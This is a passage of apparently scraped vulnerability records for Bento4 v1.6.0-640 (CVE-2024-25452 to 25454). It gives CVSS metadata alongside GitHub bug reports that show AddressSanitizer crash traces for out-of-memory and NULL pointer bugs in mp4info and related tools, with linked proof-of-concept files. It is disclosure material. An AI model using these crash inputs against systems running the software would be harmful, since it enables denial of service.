unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:286 #9 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #10 0x557daf8dbac4 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:101 #11 0x557daf8dc09b in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:57 #12 0x557daf84f9d0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:458 #13 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x557daf872856 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:84 #20 0x557daf872c33 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:50 #21 0x557daf84ecf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:580 #22 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #23 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #24 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #25 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #26 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #27 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #28 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #29 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #30 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 ==977537==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==977537==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info, mp42aac, mp42avc, mp4decrypt, mp4dump ### How to reproduce $ mp4info, mp4dump} poc-file or $ {mp42aac, mp42avc, mp4decrypt} poc-file /dev/null poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11720958/poc-file.txt)
Out-of-memory bug from AP4_DataBuffer::ReallocateBuffer() in multiple programs (v1.6.0-640)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/872/comments
2
2023-06-12T09:44:14Z
2024-02-17T17:35:35Z
https://github.com/axiomatic-systems/Bento4/issues/872
1,752,341,840
872
CVE-2024-25452
2024-02-09T15:15:09.193
Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_UrlAtom::AP4_UrlAtom() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/873" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/873
[ "Exploit", "Issue Tracking" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, There is another out-of-memory bug in the latest version (1.6.0-640) of mp4info because of the function AP4_UrlAtom::AP4_UrlAtom() at Ap4UrlAtom.cpp:71. Unlike the issue #771, this vunerability happened in the different function AP4_UrlAtom::AP4_UrlAtom(). Here is the output of program with address sanitizer attached. ### Bug Report ================================================================= ==973793==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xdd000000 bytes #0 0x7f40c85f9787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x55f6be8e4ce7 in AP4_UrlAtom::AP4_UrlAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4UrlAtom.cpp:71 #2 0x55f6be8e4ed2 in AP4_UrlAtom::Create(unsigned int, AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4UrlAtom.cpp:47 #3 0x55f6be843fc4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:585 #4 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #5 0x55f6be865836 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:84 #6 0x55f6be865c13 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:50 #7 0x55f6be841d44 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:580 #8 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #9 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #10 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #11 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #12 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #13 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #20 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #21 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #22 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #23 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #24 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #25 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #26 0x55f6be8e02a8 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4TrakAtom.cpp:165 #27 0x55f6be84239f in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4TrakAtom.h:58 #28 0x55f6be84239f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:413 #29 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #30 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 ==973793==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==973793==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721073/poc-file.txt)
Out-of-memory bug from AP4_UrlAtom::AP4_UrlAtom() in v1.6.0-640
https://api.github.com/repos/axiomatic-systems/Bento4/issues/873/comments
1
2023-06-12T10:03:27Z
2024-02-20T02:41:04Z
https://github.com/axiomatic-systems/Bento4/issues/873
1,752,379,751
873
CVE-2024-25453
2024-02-09T15:15:09.240
Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_StszAtom::GetSampleSize() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/204" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/874" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/204
[ "Exploit", "Issue Tracking" ]
github.com
[ "axiomatic-systems", "Bento4" ]
On master compiled on 2017-09-10 (but please confirm if this affects current stable): ``` # mp4compact $FILE out.mp4 ASAN:DEADLYSIGNAL ================================================================= ==156195==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000060a4b3 bp 0x7ffed6dd9e30 sp 0x7ffed6dd9e30 T0) ==156195==The signal is caused by a READ memory access. ==156195==Hint: address points to the zero page. #0 0x60a4b2 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4StszAtom.cpp:150:27 #1 0x5421ec in AP4_CompactingProcessor::TrackHandler::ProcessTrack() /tmp/Bento4-master-2017-09-10/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:132:15 #2 0x5bef58 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4Processor.cpp:617:35 #3 0x542f69 in main /tmp/Bento4-master-2017-09-10/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:220:25 #4 0x7f96ff492680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289 #5 0x44ec88 in _start (/usr/bin/mp4compact+0x44ec88) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4StszAtom.cpp:150:27 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==156195==ABORTING ``` Testcase: https://github.com/asarubbo/poc/blob/master/00363-bento4-NULLptr-AP4_StszAtom_GetSampleSize
NULL pointer dereference in AP4_StszAtom::GetSampleSize (Ap4StszAtom.cpp)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/204/comments
0
2017-09-15T07:10:24Z
2017-12-17T00:59:26Z
https://github.com/axiomatic-systems/Bento4/issues/204
257,947,117
204
CVE-2024-25453
2024-02-09T15:15:09.240
Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_StszAtom::GetSampleSize() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/204" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/874" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/874
[ "Exploit", "Issue Tracking" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, There still exists the null pointer reference bug in the latest version (1.6.0-640) of mp4info by the function AP4_StszAtom::GetSampleSize(). Here is the output of program with address sanitizer attached. ### Bug Report File: major brand: isom minor version: 200 compatible brand: isom compatible brand: iso2 compatible brand: avc1 compatible brand: mp41 fast start: yes Movie: duration: 4960 (media timescale units) duration: 4960 (ms) time scale: 1000 fragments: no Found 1 Tracks Track 1: flags: 15 ENABLED IN-MOVIE IN-PREVIEW id: 1 type: Video duration: 4960 ms language: eng media: sample count: 16449660 timescale: 25 duration: 124 (media timescale units) duration: 4960 (ms) AddressSanitizer:DEADLYSIGNAL ==973817==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x564f30ae87de bp 0x7ffd3baf13c0 sp 0x7ffd3baf13c0 T0) ==973817==The signal is caused by a READ memory access. ==973817==Hint: address points to the zero page. #0 0x564f30ae87dd in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StszAtom.cpp:154 #1 0x564f30b193c1 in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomSampleTable.cpp:162 #2 0x564f30a3993d in ScanMedia /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1270 #3 0x564f30a422ad in ShowTrackInfo_Text /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1331 #4 0x564f30a422ad in ShowTrackInfo /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1475 #5 0x564f30a42b42 in ShowTracks /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1586 #6 0x564f30a336f4 in main /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1868 #7 0x7fece57fb082 in __libc_start_main ../csu/libc-start.c:308 #8 0x564f30a377ed in _start (/home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/build/mp4info+0x447ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StszAtom.cpp:154 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==973817==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721177/poc-file.txt)
NULL pointer reference from AP4_StszAtom::GetSampleSize() in v1.6.0-640
https://api.github.com/repos/axiomatic-systems/Bento4/issues/874/comments
1
2023-06-12T10:08:57Z
2024-02-17T17:33:31Z
https://github.com/axiomatic-systems/Bento4/issues/874
1,752,392,145
874
CVE-2024-25454
2024-02-09T15:15:09.293
Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_DescriptorFinder::Test() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/875" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/875
[ "Exploit", "Issue Tracking" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, There still exists the null pointer reference bug in the latest version (1.6.0-640) of mp4info by the function AP4_DescriptorFinder::Test(). Here is the output of program with address sanitizer attached. ### Bug Report File: major brand: isom minor version: 200 compatible brand: isom compatible brand: iso2 compatible brand: avc1 compatible brand: mp41 fast start: yes Movie: duration: 4637 (media timescale units) duration: 4637 (ms) time scale: 1000 fragments: no Found 2 Tracks Track 1: flags: 3 ENABLED IN-MOVIE id: 1 type: Video duration: 4600 ms language: eng media: sample count: 138 timescale: 15360 duration: 70656 (media timescale units) duration: 4600 (ms) bitrate (computed): 6623656.562 Kbps display width: 480.000000 display height: 480.000000 frame rate (computed): 30.000 Sample Description 0 Coding: avc1 (H.264) Codec String: avc1.42C01E AVC Profile: 66 (Baseline) AVC Profile Compat: c0 AVC Level: 30 AVC NALU Length Size: 4 AVC SPS: [6742c01eda0783db0110000003001000000303c0f162ea] AVC PPS: [68ce092c80] Width: 480 Height: 480 Depth: 24 Track 2: flags: 3 ENABLED IN-MOVIE id: 2 type: Audio duration: 4673 ms language: eng media: sample count: 200 timescale: 44100 duration: 206060 (media timescale units) duration: 4673 (ms) bitrate (computed): 28737.402 Kbps AddressSanitizer:DEADLYSIGNAL ================================================================= ==973829==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x56038ea4c20e bp 0x7ffdee3bfe40 sp 0x7ffdee3bfdc0 T0) ==973829==The signal is caused by a READ memory access. ==973829==Hint: address points to the zero page. #0 0x56038ea4c20d in AP4_DescriptorFinder::Test(AP4_Descriptor*) const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4Descriptor.h:92 #1 0x56038ea4c20d in AP4_List<AP4_Descriptor>::Find(AP4_List<AP4_Descriptor>::Item::Finder const&, AP4_Descriptor*&) const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4List.h:431 #2 0x56038ea4c20d in AP4_EsDescriptor::GetDecoderConfigDescriptor() const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4EsDescriptor.cpp:207 #3 0x56038e9e0f2e in AP4_MpegSampleDescription::AP4_MpegSampleDescription(unsigned int, AP4_EsdsAtom*) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleDescription.cpp:886 #4 0x56038e9e1566 in AP4_MpegAudioSampleDescription::AP4_MpegAudioSampleDescription(unsigned int, unsigned short, unsigned short, AP4_EsdsAtom*) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleDescription.cpp:1000 #5 0x56038e9e4cd3 in AP4_MpegAudioSampleEntry::ToSampleDescription() /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:678 #6 0x56038e9f8a2c in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:181 #7 0x56038e95544e in ShowTrackInfo_Text /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1351 #8 0x56038e95544e in ShowTrackInfo /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1475 #9 0x56038e955b42 in ShowTracks /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1586 #10 0x56038e9466f4 in main /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1868 #11 